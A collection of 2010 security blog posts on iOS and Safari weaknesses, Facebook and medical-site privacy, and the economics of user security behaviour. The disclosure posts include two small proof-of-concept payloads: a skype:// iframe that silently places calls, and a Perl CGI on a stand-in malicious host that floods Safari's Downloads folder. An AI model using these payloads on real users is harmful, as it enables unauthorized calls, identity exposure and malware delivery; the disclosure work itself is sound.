As part of performing security testing of applications, it is often useful to intercept HTTP traffic being invoked by the application. Applications that use NSURLConnection's implementation as-is will reject your local proxy's self-signed certificate and terminate the connection. You can get around this easily by implanting the HTTP proxy's self-signed certificate as a trusted certificate on your iOS device [Note: This is not a loop-hole against the precautions mentioned above: in this case we have access to the physical device and are legitimately implanting the self-signed certificate].

Once you have your iOS device or simulator setup using the self-signed certificate of your HTTP proxy, you should be able to intercept HTTPS connections that would otherwise terminate. This is useful for fuzzing, analyzing, and testing iOS applications for security issues.

November 29, 2010

Popular web browsers today do not allow arbitrary websites to modify the text displayed in the address bar or to hide the address bar (some browsers may allow popups to hide the address bar but in such cases the URL is then displayed in the title of the window). The reasoning behind this behavior is quite simple: if browsers can be influenced by arbitrary web applications to hide the URL or to modify how it is displayed, then malicious web applications can spoof User Interface elements to display arbitrary URLs, thus tricking the user into thinking he or she is browsing a trusted site.

I’d like to call your attention to the behavior of Safari on the iPhone via a proof of concept demo. If you have an iPhone, browse to the following demo and keep an eye out on the address bar:

Figure: Image on left illustrates the page rendered which displays the ‘fake’ URL bar while the real URL bar is hidden above. Image on right illustrates the real URL bar that is visible once the user scrolls up.

Notice that the address bar stays visible while the page renders, but immediately disappears as soon as it is rendered. Perhaps this may give the user some time to notice but it is not a reasonably reliable control (and I don’t think Apple intended it to be).

I did contact Apple about this issue and they let me know they are aware of the implications but do not know when and how they will address the issue.

I have two main thoughts on this behavior, outlined below:

1. Precious screen real estate on mobile devices. This is most likely the primary reason why the address bar disappears upon page load on the iPhone. Note that on the iPhone, this only happens for websites that follow directives in HTML to advertise themselves as mobile sites (see the source of the index.html in the demo site above for example).

Since the address bar in Safari occupies considerable real estate, perhaps Apple may consider displaying or scrolling the current domain name right below the universal status bar (i.e. below the carrier and time stamp). Positioning the current domain context in a location that is unalterable by the rendered web content can provide the users similar indication that browsers such as IE and Chrome provide by highlighting the current domain being rendered.

2. The consequences of full screen apps in iOS using UIWebView. Desktop operating systems most often launch the default web browser of choice when an http or https handler is invoked (this is most often the case even though the operating systems provide interface elements that can be used to render web content within the applications).

However, in the case of iOS, since most applications are full-screen, it is in the interest of the application designers to keep the users immersed within their application instead of yanking the user out into Safari to render web content. Given this situation, it becomes vital for iOS to provide consistency so the user can be ultimately assured what domain the web content is being rendered from.

To render web content within applications, all developers have to do is invoke the UIWebView class. It is as simple as invoking a line of code such as [webView loadRequest:requestObj]; where requestObj contains the URL to render.

Figure: Twitter App rendering web content on the iPad.

The screenshot above illustrates web-content rendered by the fantastic Twitter app on the iPad. To create this screen-shot, I launched the Twitter app on the iPad and selected a tweet from @appleinsider and clicked on the URL http://dlvr.it/9D81j in the tweet. Notice that the URL of the actual page being rendered is nowhere to be seen.

In such cases, it is clear that developers of iOS applications need to make sure they clearly display the ultimate domain from which they are rendering web content. A welcome addition would be default behavior on the part of UIWebView to display the current domain context in a designated and consistent location.

Given how rampant phishing and malware attempts are these days, I hope Apple chooses to not allow arbitrary web applications to scroll the real Safari address bar out of view. In the case of applications that utilize UIWebView, I recommend a designated screen location label only accessible by iOS that displays the domain from where the web content is being rendered when serving requests via calls to UIWebView. That said, I do realize how precious real estate is on mobile devices and if Apple chooses to come up with a better way of addressing this issue, I'd welcome that as well.

November 08, 2010

In this article, I will discuss the security concerns I have regarding how URL Schemes are registered and invoked in iOS.

URL Schemes, as Apple refers to them, are URL Protocol Handlers that can be invoked by the Safari browser. They can also be used by applications to launch other applications to perform certain transactions, but this use case isn’t relevant to the scope of this discussion.

In the URL Scheme Reference document, Apple lists the default URL Schemes that are registered within iOS. For example, the tel: scheme can be used to launch the Phone application. Now, imagine if a website were to contain the following HTML rendered to someone browsing using Safari on iOS:

In this case, Safari asks the user for authorization before placing the call. Fantastic. A malicious website should not be able to initiate a phone call without the user’s explicit permission. This is the right behavior from a security perspective.

Now, let us assume the user has Skype.app installed. Let us also assume that the user has launched Skype in the past and that application has cached the user’s credentials (this is most often the case: users on mobile devices don’t want to repeatedly enter their credentials so this is not an unfair assumption). Now, what do you think happens when a malicious site renders the following HTML?

<iframe src="skype://14085555555?call"></iframe>

In this case, Safari throws no warning, and yanks the user into Skype, which immediately initiates the call. The security implications of this are obvious, including the additional abuse case where a malicious site can make Skype.app call a Skype-id who can then uncloak the victim’s identity (by analyzing the victim’s Skype-id from the incoming call).

Figure 2: Skype automatically initiating a call on iOS after being invoked by a malicious website

I contacted Apple’s security team to discuss this behavior, and their stance is that the onus is on the third-party applications (such as Skype in this case) to ask the user for authorization before performing the transaction. I also contacted Skype about this issue, but I have not heard back from them.

I do agree with Apple that third-party applications should also take part in ensuring authorization from the user, yet their stance leaves the following concerns unaddressed.

Third party applications can only ask for authorization after the user has already been yanked out of Safari. A rogue website, or a website whose client code may have been compromised by a persistent XSS, can yank the user out of the Safari browser. Since applications on iOS run in full-screen mode, this can be an annoying and jarring experience for the user.

Third party applications can only ask the user for authorization after they have been fully launched. To register a URL Scheme, application developers need to alter their Info.plist file. For example, here is a section from Skype’s Info.plist:

<key>CFBundleURLTypes</key>
<array>
    <dict>
        <key>CFBundleURLName</key>
        <string>com.skype.skype</string>
        <key>CFBundleURLSchemes</key>
        <array>
            <string>skype</string>
        </array>
    </dict>
</array>

[Note: If you have a jailbroken iOS device and would like to obtain the list of URL Schemes for applications you have downloaded from the App Store, just copy over the Info.plist files for the applications onto your Mac and run the plutil tool to convert them to XML: plutil -convert xml1 Info.plist]
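Once converted to XML, the declared schemes can also be extracted programmatically. Here is a small sketch using Python's plistlib (the file path is whatever you copied over; note this surfaces only the scheme prefixes, not the full URL patterns the app parses in code):

```python
import plistlib

def registered_url_schemes(info_plist_path):
    """Return the scheme strings an app declares under CFBundleURLTypes.
    These are only the protocol prefixes (e.g. 'skype'); the full URL
    patterns the app responds to are parsed in code, not in the plist."""
    with open(info_plist_path, "rb") as f:
        info = plistlib.load(f)
    schemes = []
    for url_type in info.get("CFBundleURLTypes", []):
        schemes.extend(url_type.get("CFBundleURLSchemes", []))
    return schemes
```

Running this over every app's Info.plist yields exactly the kind of device-wide scheme inventory argued for later in this article.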

Next, the application needs to implement handling of the message in its delegate. For example:

Unlike the case of the tel: handler which enjoys the special privilege of requesting the user for authorization before yanking the user away from his or her browsing session in Safari, third party applications can only request authorization after they have been fully launched.

A solution to this issue is for Apple to allow third party applications the option to register their URL Schemes with prompt strings, so that Safari can ask the user for authorization prior to launching the external application.

Should Apple audit the security implications of registered URL schemes as part of its App Store approval process? Apple’s tel: handler causes Safari to ask the user for authorization before placing phone calls. The most logical explanation for this behavior is that Apple is concerned about their customers’ security and doesn’t want rogue websites to be able to place arbitrary phone calls using the customer’s device.

However, since the Skype application allows for such an abuse case to succeed, and given that Apple goes to great lengths to curate applications before allowing them to be listed in the App Store, should Apple begin to audit applications for security implications of exposed URL Schemes? After all, Apple is known to reject applications that pose a security or privacy risk to their users, so why not demand secure handling of transactions invoked by URL Schemes as well?

List of registered URL Schemes not available to the user. You can enumerate all the Info.plist files in your iPhone to ascertain the list of URL schemes your iPhone or iPad may respond to, assuming you have jailbroken your iPhone. However, it may make sense for this list to be available in the Settings section of iOS so users can look at it to understand what schemes their device responds to that can be invoked by arbitrary websites. Perhaps this will mostly appeal to advanced users, yet I feel it will help keep application designers disciplined the same way the user location notification in iOS does. This will also make it easier for enterprises to figure out which third party applications to provision on their employee devices based on any badly designed URL schemes that may place company data at risk.

Note that in order to create a registry of exposed URL schemes, Apple cannot simply parse information from Info.plist because it only contains the initial protocol string. In other words, the skype: handler responds to skype://[phone_or_id]?call and skype://[phone_or_id]?chat, but only the skype: protocol is listed in Info.plist while the actual parsing of the URL is performed in code. Therefore, in order to implement this proposed registry system, Apple will have to require developers to disclose all patterns within a file such as Info.plist.

I feel the risk posed by how URL Schemes are handled in iOS is significant because it allows external sources to launch applications without user interaction and perform registered transactions. Third party developers, including developers who create custom applications for enterprise use, need to realize their URL handlers can be invoked by a user landing upon a malicious website and not assume that the user authorized it. Apple also needs to step up and allow the registration of URL Schemes that can instruct Safari to throw an authorization request prior to yanking the user away into the application.

Given the prevalence and ever growing popularity of iOS devices, we have come to entrust Apple’s platform with our personal, financial, and health-care data. As such, we need to make sure both the platform and the custom applications on iOS devices are designed securely. I hope this writeup helped increase awareness of the need to implement URL Schemes securely and what Apple can do to assist in making this happen.

September 29, 2010

Healthcare organizations spend hundreds of millions of dollars every year struggling to secure and protect patient records. Patients have traditionally demanded that their information be secured and inaccessible by the public. Regulations require due diligence to ensure that patient records are protected. In addition to this, healthcare organizations may also consider medical data as their intellectual property that can lead to further business intelligence.

But what happens when patients volunteer their private medical records into the public domain? In this article, I’d like to present my thoughts on this topic.

Consider the PatientsLikeMe website, which is a social networking platform for individuals to publicly share their medical data, including fine details of their diagnosis, physical conditions, locations, medications, mood, and other information. The benefits of PatientsLikeMe are clear: it is a wonderful platform for individuals and medical researchers to find useful statistical information about diseases, and for patients to connect with and share experiences with others who may be suffering similar conditions.

From a security and privacy lens, here are some of my observations:

False sense of anonymity. The PatientsLikeMe website does a fantastic job of declaring its openness policy by warning users that information shared on the platform can be collected and cached by search engines.

I spent some time studying profiles of individuals affected with conditions that, unfortunately, have a social stigma attached to them. A lot of these individuals chose to use a nick-name, or handle, instead of their real name in their profile. However, by using mere link and network analysis techniques (as presented in my Psychotronica series of talks), I was quickly able to uncloak the real identities of many of these individuals.

The issue here is that, despite the awareness efforts of PatientsLikeMe, many individuals using the service have a false sense of privacy: they may feel they are truly anonymous, yet their identities can be easily uncloaked.

Stunning intelligence potential for the adversary. It is clear that information collected from patient records can be useful to an adversary. However, a sophisticated adversary is likely to correlate the information found in the patient record online with additional sources of social data (Facebook profiles, Twitter messages, blogs, etc). This combined dashboard of intelligence, collected from piecing together additional sources of publicly available information, puts the adversary at a significant advantage. Not only can an external entity ascertain pure medical data, but also make judgment-calls on the lifestyle of the particular individual that may have led to his or her condition. In addition, the potential abuse for social engineering and manipulation tactics is also clear.

Business conflict. Many healthcare organizations are struggling to enforce security controls on traditional issues such as internal access management of medical data. Hundreds of millions of dollars are being spent by private healthcare organizations to promote internal security efforts. In the near future, as additional individuals share their medical information on social media platforms, the value of return from access controls to secure patient data will reduce. I realize the regulatory complications and influences here – it will be interesting to see how this plays out.

In summary, the medical benefits of services like PatientsLikeMe are clear. However, I do wish that individuals who utilize these services were more cognizant of the privacy and security implications. I also wish that healthcare organizations quickly rethink their stance on the security and privacy implications of social media (which seems to be limited in scope to monitoring their own employees) to better align the reality of the upcoming social age with their business.

September 12, 2010

Given the continuous and exponential rise in complexity in the field of information security, most often, it is the actual employee that is observed to be the weakest link. End users are repeatedly found to make poor security decisions that appear to be irrational and careless, thus placing their employer at significant business risk.

One emerging school of thought to combat the seemingly nonchalant user attitude against information security is to enforce a consequence-driven work culture that aims to promote positive cultural change by maximizing accountability (e.g., employees that are caught placing confidential data on unencrypted stores or those who bring in personal wireless access points to work are terminated per formal policy).

This discussion brings together insights from the field of behavioral economics and recent research literature to demonstrate why 1) a pure consequence driven approach that solely relies on accountability does not promote risk reduction to the enterprise, and 2) why employees are rational in rejecting information security rules even when clear consequences are published and enforced.

1. Introduction

When it comes to following basic information security best practices, many employees appear to be irrational despite well advertised consequences: they go trigger-happy while browsing the web and download malware to their corporate laptops, they get around password complexity policies to choose the weakest passwords they can get away with [1][2], they ignore certificate errors and accept security warnings without reading them [3] and they inadvertently expose confidential data on social media sites [4].

Clearly, there are specific cases of malicious intent on the part of unethical employees who are aware of their actions. However, the scope of this discussion is limited to employees who do not have malicious intent, yet place the enterprise at risk by rejecting repeated security advice.

In this discussion, I argue that a purely consequence and accountability driven approach to influencing user behavior is a myopic strategy that is not likely to succeed in promoting significant risk reduction to the enterprise. I argue that in order to influence users to promote positive cultural change in security related behavior, the enforcers must comprehend additional variables such as the difference in the perspective of risk to the individual, psychological biases and simple behavioral economics.

2. The Perspective of the End User

Using basic risk assessment principles, it is possible to estimate the risk to a business should certain events occur. While these events may pose a significant risk to the enterprise as a collective, the probability and cost to the individual employee can differ. The realization of this variance in perspective between the individual and the collective sets the stage for further discussion on psychology and economics covered in the following sections.

2.1 Collective Risk to the Enterprise Versus the Individual

Consider the perspective of an enterprise when a number of employees do not follow best practice security advice, such as securing their laptops at their workplace. This behavior can contribute to a high probability of adverse consequences for the business. However, the same amount of risk is not borne by the individual employee.

As an illustration, consider the case of laptop theft. Let us assume a situation where an employer repeatedly warns employees to secure laptops using the cables provided. In a mid-sized company of 5,000 employees, even if 90% of the employees were to follow instructions, the remaining 500 employees who reject the advice pose a significant risk to the business, since the probability of at least 1 out of 500 unsecured laptops being stolen on an annual basis is a realistic (and conservative) estimate.

The cost to the enterprise per stolen (unencrypted) laptop is estimated to be around $49,246 [5]. More importantly, this cost estimate is based on the following components: replacement cost, detection, forensics, data breach implications, lost intellectual property, lost productivity, and legal, consulting, and regulatory expenses. In addition to the measurable cost to the business, the loss due to brand damage can be, and often is, significant.

Given our conservative guess of 1 laptop stolen annually for every 500 employees who do not bother to secure their laptops, the risk to the enterprise is close to a certainty. But what about the individual employee? The employee risks termination, yet the probability that it is her laptop, rather than one belonging to the other 499 employees who do not follow security mandates, that is stolen is low.
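The arithmetic behind this variance can be sketched in a few lines. The per-laptop annual theft probability used below is an assumed figure purely for illustration; only the $49,246 cost per stolen laptop comes from the cited estimate [5]:

```python
# Collective vs. individual risk for the hypothetical laptop scenario.
# p_theft is an assumed illustrative probability, not a cited statistic.
n_unsecured = 500          # employees who leave laptops unsecured
p_theft = 0.002            # assumed annual theft probability per unsecured laptop
cost_per_laptop = 49_246   # estimated cost per stolen unencrypted laptop [5]

# Enterprise view: probability of at least one theft across all 500 laptops
p_enterprise = 1 - (1 - p_theft) ** n_unsecured   # ~63%

# Individual view: probability that this particular employee's laptop is stolen
p_individual = p_theft                            # 0.2%

expected_annual_loss = n_unsecured * p_theft * cost_per_laptop

print(f"Enterprise:  P(>=1 theft) = {p_enterprise:.1%}")
print(f"Individual:  P(theft)     = {p_individual:.1%}")
print(f"Expected annual loss      = ${expected_annual_loss:,.0f}")
```

Even under these modest assumptions, the collective faces a better-than-even chance of at least one theft per year, while any single employee faces only a fraction of a percent chance.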

The purpose of this hypothetical discussion is purely to point out the variance in risk from the perspective of the enterprise as a collective versus that of the individual employee. In the majority of situations, the risk borne by the business as a whole is easily grasped by those who understand enterprise risk, yet the individual worker may not share a similar perspective.

2.2 Game Theory

In the previously discussed scenario, the calculations demonstrate the variance in cost to the individual versus cost to the collective enterprise. However, it can be argued that the employee’s job security relies upon the overall well-being of the enterprise. This sentiment promotes the notion that employees can be expected to collectively cooperate and follow security mandates. In this sense, the operative word is “cooperate”: we should test whether employees’ decisions to follow policies for the overall good of the enterprise are influenced by what they notice their peers doing.

The “Prisoner’s Dilemma” [6] is a popular game theory [7] problem that has been used to show why two people may not cooperate even when it is in both their interests to do so. This problem has been extended to study the cooperation, or lack thereof, of individual entities to promote a common interest. For example, environmental studies have clearly provided evidence of the perils mankind faces given the climate change crisis. Given this situation, individual countries know they will ultimately benefit from everyone doing their part to promote a stable climate in the future. However, in game theory experiments deriving from the “Prisoner’s Dilemma” approach, results repeatedly demonstrate that while individual countries agree with the rationale that everyone must contribute for the greater good of all, they fail to act on an individual level to do their part in the equation [8].
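The dominance reasoning underlying the “Prisoner’s Dilemma” can be made concrete with the standard textbook payoff matrix; the payoff values below are the conventional illustrative ones:

```python
# Standard Prisoner's Dilemma payoffs (higher is better for "me").
# Whatever the other party does, defecting yields the higher payoff,
# even though mutual cooperation (3,3) beats mutual defection (1,1).
payoffs = {  # (my_move, their_move) -> my payoff
    ("cooperate", "cooperate"): 3,
    ("cooperate", "defect"):    0,
    ("defect",    "cooperate"): 5,
    ("defect",    "defect"):    1,
}

for their in ("cooperate", "defect"):
    best = max(("cooperate", "defect"), key=lambda me: payoffs[(me, their)])
    print(f"If the other party plays '{their}', my best response is '{best}'")
```

This is the same structure as the security-mandate setting: the individually rational move (skip the security chore) dominates, even though universal cooperation is better for the collective.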

Extending the general findings from “Prisoner’s Dilemma” experiments to the hypothetical scenario presented in the earlier section, it is possible to see why individuals who are consciously aware of the need to cooperate in following security mandates may fail to do so. This situation lends itself to the phenomenon where users who do not follow security requirements appear to “free-ride” on the notion that the remaining majority of users are following the security advice, thereby lowering the probability of harm to the well-being of the collective [9].

Our acknowledgement of differences in perspectives of risk, and our comprehension of cognitive decision-making processes, will assist us in designing security mechanisms that engage active participation from end users. In the next section, we will build on our discussion with examples of the psychological and economic underpinnings at work that can help facilitate further improvement in our understanding.

3. Psychology and Economics at Play

Given that the scope of this discussion is to hypothesize why individuals do not follow mandates even when consequences are clearly advertised, let us first take a look at examples of how psychological biases are often active in this regard. Furthermore, let us briefly discuss the cost:benefit calculation individuals are likely to make prior to deciding whether to invest effort into performing requested tasks.

Once we go through examples of how psychology and economics shape decisions, we will be in a better position to discuss recommendations on how to leverage research within these fields to drive better adoption of information security mandates.

3.1 Psychological Biases

Security controls are often designed with the misguided assumption that human rationality is void of biases. On the contrary, human decisions consistently contain psychological biases that are predictable and measurable. As such, let us discuss two examples of biases that are often activated when individuals seek to comprehend and act upon information security events.

Valence Effect: The Valence Effect is the tendency of individuals to overestimate the probability of positive outcomes. For example, in one experiment, all other things being equal, participants assigned a higher probability to picking a card that had a smiling face on its reverse side than to picking one that had a frowning face [10].

Extending the knowledge of results from repeated experiments performed to demonstrate the valence effect, it is easy to see how this bias influences employee behavior: individuals who do not follow security mandates have a psychological bias promoting the idea that other individuals are more likely to cause adverse incidents. In a similar vein, studies have shown that online social media users believe that providing personal information publicly could cause privacy problems to other users (the same users don’t seem concerned about the probability of privacy issues they could face for sharing similar information) [11].

Anchoring: Anchoring is a cognitive bias that describes the common human tendency to rely too heavily (“anchor”) on one trait or piece of information when making decisions.

Research has shown that individuals often believe “neat looking” websites are more trustworthy from a privacy and security standpoint [12] by anchoring their bias using their visual experiences to correlate website design with previously successful transactions. It is easy to understand how this bias can cause individuals to bypass advice from security awareness programs on how to identify and steer clear of risky situations.

Research in psychology has uncovered empirical evidence to support various categories of biases. As described in the examples, such biases help explain why many individuals fail to execute security requirements.

3.2 Rational Rejection of Security Mandates

Individuals implicitly perform a cost:benefit calculation when deciding whether to execute a previously taught security mandate or not. This hypothesis derives from work in the field of behavioral economics as well as information security research experiments performed recently. Coupled with the comprehension of individual perspectives and psychology, the understanding of how individuals perform implicit cost:benefit decisions will ultimately help organizations create security requirements that are designed to appeal to the human psyche, thus driving increased adoption.

When people make decisions to perform a given task, they quickly perform a calculation to ascertain if the cost of performing it is worth the return. The cost to the individual can be bounded in terms of financial harm, time taken, and effort required. In addition to the biases discussed previously, users quickly decide if the total gain from following security advice is worth the effort. In many security research experiments, the data shows that users reject security advice because the cost to complete the security requirements is too high.

Consider the case of phishing websites that have the potential to steal corporate and user data by posing as legitimate sites. Employees are repeatedly taught to inspect their web browser’s address bar to make sure they are browsing legitimate websites. However, even the most well-known domain names of well-respected institutions repeatedly redirect the user to multiple locations. In this situation, the user must have the technical ability to dissect and parse the browser address bar and distinguish the host name and the domain name, followed by the path to the website resources and any applicable parameters. To the average non-technical individual, the burden is too high [3]. Should the individual expose corporate data to a malicious website, the cost of the data breach is borne by the corporation.
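The parsing burden described above can be made concrete. Both URLs below are fabricated examples; the point is that the only security-relevant token is the hostname, which a non-technical user must mentally extract from the full string:

```python
# What a user must do to judge a link: extract the hostname (the only
# security-relevant token) from the full URL. Both URLs are fabricated
# examples; "evil-host.net" stands in for an attacker-controlled domain.
from urllib.parse import urlparse

legit = "https://www.example-bank.com/login?session=abc123"
phish = "https://www.example-bank.com.evil-host.net/login?session=abc123"

for url in (legit, phish):
    parts = urlparse(url)
    print(f"hostname={parts.hostname}  path={parts.path}")
```

The second URL contains the legitimate brand name verbatim, which is precisely why scanning the address bar for a familiar name is not a reliable defense.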

Also consider the case of SSL certificate warnings displayed by web browsers. Users are instructed to be cognizant of such warnings because they may be the indicator of an ongoing Man-in-the-Middle attack that can jeopardize corporate information. However, research has shown that, from the end user’s perspective, close to 100% of such warnings are false positives [3]. It is easy to see how the high probability of a false-positive warning, combined with close to zero return for the effort spent heeding it, makes it rational for users to dismiss such advice.
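The user’s implicit cost:benefit calculation here can be sketched as a back-of-the-envelope expected-value comparison. The attack base rate and dollar figures below are assumptions chosen purely for illustration; only the observation that nearly all warnings are false positives comes from the cited research [3]:

```python
# Expected value of heeding every certificate warning, from the user's view.
# All three numbers are assumed illustrative values, not cited statistics.
p_real_attack = 1e-5        # assumed fraction of warnings that are real MITM attacks
loss_if_ignored = 10_000    # assumed loss ($) if a real attack succeeds
cost_per_heeded = 0.50      # assumed value ($) of time/disruption per heeded warning

expected_benefit = p_real_attack * loss_if_ignored   # $0.10 per warning
print(f"Expected benefit of heeding: ${expected_benefit:.2f}")
print(f"Cost of heeding:             ${cost_per_heeded:.2f}")
print(f"Heeding is rational:         {expected_benefit > cost_per_heeded}")
```

Under these numbers the expected benefit is a fraction of the cost, so dismissing the warning is, from the individual’s perspective, the economically rational move.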

Having discussed examples of how psychology and decision economics influence decisions, it is easy to see why it is vital that these variables are accounted for when developing security requirements. If we want users to actually adopt and execute security mandates, we need to make sure the requirements are designed to appeal to human cognition.

4. Recommendations

Based on the investigation of psychological perspectives and cost:benefit analysis using behavioral economic principles, the research community has gained further insight into why individuals often reject following security mandates. In these situations, with all other variables being equal, accelerating accountability by enforcing stricter consequences is not likely to positively influence user behavior.

Businesses that seek to positively influence their risk posture by influencing users and promoting positive culture change in information security should consider the following recommendations:

- Identify and automate security responses that can be machine parsed and computed instead of relying on human decisions.

- Re-evaluate business risk assessment methodologies to account for differences in collective and individual perspectives of risk, cost, and probability.

- Discover and calculate the influence of popular psychological biases to ascertain why employees may have the tendency to bypass advertised security requirements.

- Detect cases where security requirements impose a high cost on the individual. In such cases, evaluate whether the issue is promoting risk to the enterprise, and if so, consider redesigning the usability or altering the control such that the user is psychologically influenced to engage.

- Leverage well known psychological biases for the benefit of information security related communications.

Security mandates are important, and it is only fair that employees who do not follow instructions, and thereby put the enterprise at risk, should face clear consequences. However, solely depending on this approach ignores vital variables such as individual perspectives, psychology, and simple behavioral economics. Information security personnel should be monitored to make sure they are not solely pushing for a consequence-driven culture that makes their job easier by promoting irrational and high-cost security requirements to end users under the guise of accountability.

June 01, 2010

It is my opinion that the popular expectation that Facebook will eventually take privacy seriously is unfounded. Facebook is a profitable entity and their business roadmap clearly illustrates that they feel they are at a stage where user privacy must be compromised for their business to grow.

In other words, it is the users who must battle with the decision to either stop using Facebook, or to accept to collaborate and communicate using a platform that mines their private information to compute business intelligence for eventual profit.

Perhaps this is a fair set of options, given that the concept of ‘social privacy’ is an oxymoron: if we want to be social and benefit from it, we must share information about ourselves. However, this sort of reasoning is not grounded in reality, for the same reason that disconnecting your computer from the Internet to gain the utmost level of security isn’t a reasonable option (for most people).

It is also my opinion that the online social space has created a condition where end users must ultimately collaborate to initiate an ongoing privacy arms race. To promote this sentiment, and to further the cause of research in this field, I’d like to announce the AntiSocial project.

The AntiSocial project is a subset of my research under the NeuroSploits umbrella (more on NeuroSploits later). I have developed a Firefox extension to promote this effort. If you are in a hurry, you can download it from https://addons.mozilla.org/en-US/firefox/addon/162098/ (beware that it is an initial release, but you are most welcome to try it out and provide feedback).

At the moment, the following is what AntiSocial aims to do and how it works.

A. Provide additional privacy controls and features to the user by:

- Preventing external sites from including Facebook content. This prevents Facebook from being able to track the user’s browsing habits external to Facebook (via the Referrer header).

Figure: Screenshot of CNN.COM being prevented from embedding Facebook content

- Preventing users from landing upon Facebook from external resources. This also prevents Facebook from being able to track the user’s browsing habits external to Facebook (via the Referrer header).

- Banning all access to 3rd party Facebook applications, including applications that choose to use Facebook’s Automatic Authentication in which users are not given the opportunity to authorize the execution of the 3rd party application. This will prevent arbitrary 3rd parties from being able to capture user data.

Figure: Screenshot of AntiSocial in the Firefox task bar

- Preventing external sites that are landed on from Facebook from capturing this fact (by modifying the Referrer header).

- [more to come]
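The tracking that the features above block relies on the HTTP Referer header (spelled “Referer”, with one r, on the wire). The sanitization idea can be sketched outside of any browser; the header values below are hypothetical:

```python
# Sketch of the Referer leak: when a page on an external site embeds Facebook
# content, the browser's request to facebook.com carries the embedding page's
# URL in the Referer header. Header values here are hypothetical.
request_headers = {
    "Host": "www.facebook.com",
    "Referer": "http://www.cnn.com/some/article",  # leaks what the user is reading
}

# AntiSocial-style mitigation: drop (or rewrite) the header before sending.
sanitized = {k: v for k, v in request_headers.items() if k.lower() != "referer"}
print(sanitized)  # the Referer entry is gone
```

In the actual extension this stripping happens inside Firefox before the request leaves the browser; the snippet only illustrates the transformation applied to the headers.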

B. Increase the noise to signal ratio of business intelligence collected by social media platforms (currently Facebook) by [research in progress]:

- Changing the Referrer header while the user browses the Facebook platform (this will not stop Facebook from collecting intelligence about the user's browsing habits within the platform, but it may make their data mining slightly more expensive).

- Changing the referrer information tracked within the Facebook cookie (this will not stop Facebook from collecting intelligence about the user's browsing habits within the platform, but it may make their data mining slightly more expensive).

- Initiating arbitrary requests to the Facebook platform to make it harder for Facebook and 3rd parties to compute business intelligence (work in progress) for given sets of computations that the user may not agree to.

- [more to come]

Please feel free to contact me with any bug reports, questions, or ideas.

[As a caveat, I’m a fan of the NoScript Firefox plugin and I do realize that some (if not all) of these feature sets can and may be incorporated by NoScript - however, the AntiSocial Firefox extension aims to target users that may not be technically savvy enough to maneuver a tool such as NoScript, and also to further my own understanding and research of privacy issues in social platforms].

May 22, 2010

Two years ago, I reported the Safari Carpet Bomb vulnerability to Apple. Apple responded back to let me know that they did not consider the issue a security vulnerability and had no immediate plans of fixing it. After obtaining explicit permission from the Apple security team to discuss the issue publicly, I disclosed it on May 14, 2008. This attack vector was eventually voted #3 in the “Top 10 Web Hacking Techniques of 2008” by security professionals around the world.

The Carpet Bomb issue was fixed in Safari for Windows due to pressure from Microsoft, most likely a result of other security professionals quickly realizing the impact of cross-application issues that made remote command execution possible on Windows. This caused Microsoft to release an advisory against Safari, and Apple to eventually fix the issue in Safari for Windows.

However, 2 years after my original disclosure, the Carpet Bomb vulnerability on OSX remains un-patched.

This means that if you use the Safari browser on OSX, a malicious entity can drop any number of binaries or data files into your ~/Downloads/ folder. This issue arises because, while most sane web browsers warn the end user and ask for explicit permission before saving a file locally, Safari goes ahead and saves the file into the default download location without asking the user - even if hundreds of files are served up by the malicious website simultaneously.

The technical details of the issue are the same as I reported 2 years ago, as follows: assume that a malicious website serves HTML that repeatedly references http://malicious.example.com/cgi-bin/carpet_bomb.cgi, for example via a series of iframe elements.

Now assume that http://malicious.example.com/cgi-bin/carpet_bomb.cgi is the following:

#!/usr/bin/perl

# Serve a Content-Type the browser cannot render, forcing a silent download
print "Content-type: blah/blah\n\n";

Since Safari does not know how to render content-type of blah/blah, it will automatically start downloading carpet_bomb.cgi every time it is served.

If you are using Safari for OSX, this is what your ~/Downloads/ folder can look like after a single visit to the malicious site:

The impact of this issue should be clear to anyone with a reasonable and sound mind.

In this day and age, Fortune corporations are being infiltrated by way of state-sponsored attacks and corporate espionage, where a common initial step taken by malicious actors is to drop malware on the desktops of the targeted organization’s users.

BONUS! Unlike (most) other browsers, Safari (on both Windows and OSX this time) doesn’t bother to ask for the user’s permission prior to launching arbitrary local applications that handle registered URIs.

The following video capture demonstrates what would happen if you landed upon such a malicious site:

This may seem more of an annoyance at first glance, which in itself is an issue: denial of service towards the victim user’s desktop session. Furthermore, this behavior has the potential to be abused to exploit defects in how receiving applications accept the launch parameters and also to potentially feed local applications with malicious data that can in turn result in a compromise.

Given the continued rise in OSX’s market-share, and given the fact that Apple has decided to allow security issues like this remain un-patched, the Safari browser is increasingly likely to become the avenue of choice for the new generation of attackers.

April 06, 2010

Facebook users have been repeatedly warned and educated to comprehend the reality that 3rd party Facebook applications can consume their private information. As such, many users have begun to expect a fair warning (illustrated in the figure below) that includes an explicit authorization request from the Facebook platform, when a 3rd party Facebook application is accessed.

“Automatic authentication means that if a user visits an application canvas page (whether it's an FBML- or iframe-based canvas page), Facebook will pass that visitor's user ID to the application, even if the user has not authorized the application. The UID also gets passed when a user interacts with another user's application tab.

With this ID, the application can access the following data for most users (except for users who have chosen to not display a public search listing):

name

friends

Pages fanned

profile picture

gender

current location

networks (regional affiliations only)

list of friends”

The ‘Automatic Authentication’ feature is not new - it has been in place since July 2008. I’m bringing it to attention today for the following reasons:

Even the more privacy-savvy individuals are not aware of this ‘feature’. Individuals who have made the effort to learn about Facebook’s privacy settings are unlikely to be aware of this capability. Many of these users are likely to go trigger-happy clicking on URLs within Facebook because they rely on the Facebook platform to ask for explicit authorization upon landing on a 3rd party application page.

The implications of publicly available data and the potential ability of a rogue 3rd party to uncloak a specific user’s identity are two distinct issues.

In their explanation on the developer wiki, Facebook explicitly states that 3rd party applications using this feature can only gather information about the given user that may be publicly searchable anyway.

However, this assurance from Facebook is without merit because the implied reasoning is based upon flawed assumptions: the act of users choosing to make some of their information publicly searchable does not imply in any way that users are granting rogue 3rd party applications the ability to uncloak their identity (and data). Here is a simple example: my name is Nitesh Dhanjani and the information on my blog is public - however, my web browser vendor cannot use this as a reasonable excuse to uncloak my identity to 3rd party web applications I visit.

The widening delta between the granularity of controls provided by social media platforms and the controls demanded by privacy advocates may lead to the need for client-side controls.

Image: The fb_fromhash parameter

For example, users that land upon Facebook applications will notice a parameter called _fb_fromhash which is present regardless of what authorization mechanism the 3rd party Facebook application chooses to use. This can be potentially leveraged to create a browser side control (example: Firefox plug-in) to warn the user that he or she may be accessing a 3rd party application that has the ability to automatically capture his or her identity. In other words, I foresee the need for a client side model to bridge the gap between privacy controls provided by vendors of social platforms versus the needs of individual users. Social-privacy-client-IDS, if you want to call it that.
